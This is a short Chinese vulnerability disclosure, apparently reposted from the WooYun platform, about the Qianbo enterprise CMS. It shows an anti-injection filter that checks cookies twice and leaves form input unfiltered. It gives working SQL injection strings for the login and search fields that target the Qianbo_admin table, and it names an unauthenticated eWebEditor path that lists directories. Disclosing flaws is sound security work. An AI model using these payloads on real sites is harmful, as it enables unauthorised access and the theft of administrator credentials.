好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

一个防注入的小白错误-千博企业程序 - 网站安全

千博企业站程序,防注入语句里有一个小白错误! 详细说明:If EnableStopInjection = True Then If Request.QueryString <> "" Then Call StopInjection(Request.QueryString) If Request.Cookies <> "" Then Call StopInjection(Request.Cookies) If Request.Cookies <> "" Then Call StopInjection2(Request.Form) End If ======================== 防注入开始还是Encode的,通过Echo他们的解码程序,才发现,这里面把cookie是否空判断两次。造成了Form的恶意字符提交。 漏洞 证明:一个鸡肋的前台用户登陆Md5值是1,语句写在用户名里,密码写1 ' UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where ''='   这个鸡肋的前台登陆只能到达MemberLogin. asp 的48行 If UCase(LoginName) = UCase(MemName) And LoginPassword = Password LoginName取的就是刚刚的那串语句,而查询结果的用户名是1所以卡在了这里 ================================================================= http://www.2cto.com /system/ewebeditor/asp/browse.asp?action=FOLDER&style=coolblue&cusdir=dir&type=FILE 后台ewebeditor没有做权限的验证,可导致游客直接浏览 FCK也可列目录用本地的Test连上他们的Fck =================================================================== 搜索框中输入   %' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'=' ================================================================== 一堆鸡肋啊。。 修复方案:   各种修复啊,你们都懂的!!!   作者  B1uH4ck@乌云

查看更多关于一个防注入的小白错误-千博企业程序 - 网站安全的详细内容...

  阅读:68次